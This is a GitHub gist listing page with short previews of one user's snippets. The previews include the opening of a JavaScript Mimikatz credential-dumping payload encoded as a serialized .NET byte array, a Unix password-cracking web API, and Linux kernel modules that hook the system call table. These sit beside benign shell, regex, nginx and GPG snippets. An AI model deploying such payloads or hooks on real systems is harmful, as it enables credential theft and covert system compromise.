Skip to content

Instantly share code, notes, and snippets.

View shekkbuilder's full-sized avatar

shekk shekkbuilder

View GitHub Profile
@shekkbuilder
shekkbuilder / katz.js
Created April 29, 2017 02:31
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
@shekkbuilder
shekkbuilder / basic_socket_usage.rb
Created April 26, 2017 06:23 — forked from picatz/basic_socket_usage.rb
Violent Ruby: Banner Grabber - Basic Socket Usage
# coding: utf-8
# Basic socket usage to grab a banner.
# @author Kent 'picat' Gruber
require 'socket'
# Grab the banner of a given +ip+ address and +port+
# to attempt to connect to.
#
# @param ip [String] Target IP address.
@shekkbuilder
shekkbuilder / streaming_unix_password_cracking_api.rb
Created April 26, 2017 06:22 — forked from picatz/streaming_unix_password_cracking_api.rb
Violent Ruby: Streaming REST API Unix Password Cracker
require 'json'
require 'sinatra'
require 'violent_ruby'
post '/crack_passwords' do
content_type :json
config = {
file: params['file'][:tempfile],
dictionary: params['dictionary'][:tempfile]
}
@shekkbuilder
shekkbuilder / SystemCallHooking.c
Created April 26, 2017 01:58 — forked from mike820324/SystemCallHooking.c
An example of Hooking Linux System Call
#include <linux/module.h>
#include <linux/printk.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#include <asm/pgtable_types.h>
#include <linux/highmem.h>
#include "hook_function_ptr.h"
@shekkbuilder
shekkbuilder / Makefile
Created April 26, 2017 01:51 — forked from ilammy/Makefile
Linux kernel system call table hooking
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
@shekkbuilder
shekkbuilder / hex2dec.sh
Last active April 22, 2017 05:58 — forked from jrelo/hex2dec.sh
hex to decimal command line conversion methods.
quick:
$ echo $((0x15a))
346
$ printf '%d\n' 0x15a
346
$ perl -e 'printf ("%d\n", 0x15a)'
346
@shekkbuilder
shekkbuilder / modprobel.sh
Created April 20, 2017 00:17 — forked from jrelo/modprobel.sh
modprobe -l replacement
#!/bin/bash
#kmods and stuff
#grep -o '[^\/]*$' /lib/modules/$(uname -r)/modules.builtin > /tmp/mods.builtin ; find /lib/modules/$(uname -r)/kernel -type f -printf '%f\n'|grep -v -f /tmp/mods.builtin|cut -d\. -f1|while read; do modinfo $REPLY;done
#grep -H '' /sys/module/*/parameters/*
for i in `find /sys/ -name modalias -exec cat {} \;`; do
/sbin/modprobe --config /dev/null --show-depends $i ;
done | rev | cut -f 1 -d '/' | rev | sort -u
find /lib/modules/$(uname -r)/kernel -type f -printf '%f\n' | sort | while read mod;do [ $(lsmod | grep -c ${mod/.ko/}) -ge 1 ] && echo "$mod (loaded)" || echo "$mod";done | tee /tmp/modules.out
@shekkbuilder
shekkbuilder / nginx.sh
Created April 16, 2017 14:11 — forked from simonw/nginx.sh
Run nginx and serve the current directory contents (without needing a config file), logging to stdout/stderr
#!/bin/bash
if [ $# -ge 1 ]; then
PORT=$1
else
PORT=8000
fi
CONF_PATH=$(mktemp /tmp/nginx-tmp-config.XXXXXXXX) || { echo "Failed to create temp file"; exit 1; }
cat > $CONF_PATH <<- EOF
daemon off;
@shekkbuilder
shekkbuilder / ipv6-regex-test.sh
Created April 8, 2017 19:21 — forked from syzdek/ipv6-regex-test.sh
Simple script to test my IPv6 regular expression.
#!/bin/sh
#
# Use posixregex CLI tool from: https://github.com/syzdek/dmstools/blob/master/src/posixregex.c
RE_IPV4="((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])"
posixregex -r "^(${RE_IPV4})$" \
127.0.0.1 \
10.0.0.1 \
192.168.1.1 \
@shekkbuilder
shekkbuilder / ABOUT
Created April 6, 2017 11:00 — forked from anonymous/ABOUT
Ultimate-GPG-Settings
The Goals of this Gist are to:
[1] Increase the GnuPG key size limit beyond 4096 bits.
[2] Provide configuration files that maximize security and anonymity.
For now, the ideal configuration files have been provided.
The Debian_Linux_GnuPG_Compiler.bash script works to build GnuPG with the 4096 bit key size limit raised.
Please provide input. Feedback and changes welcome.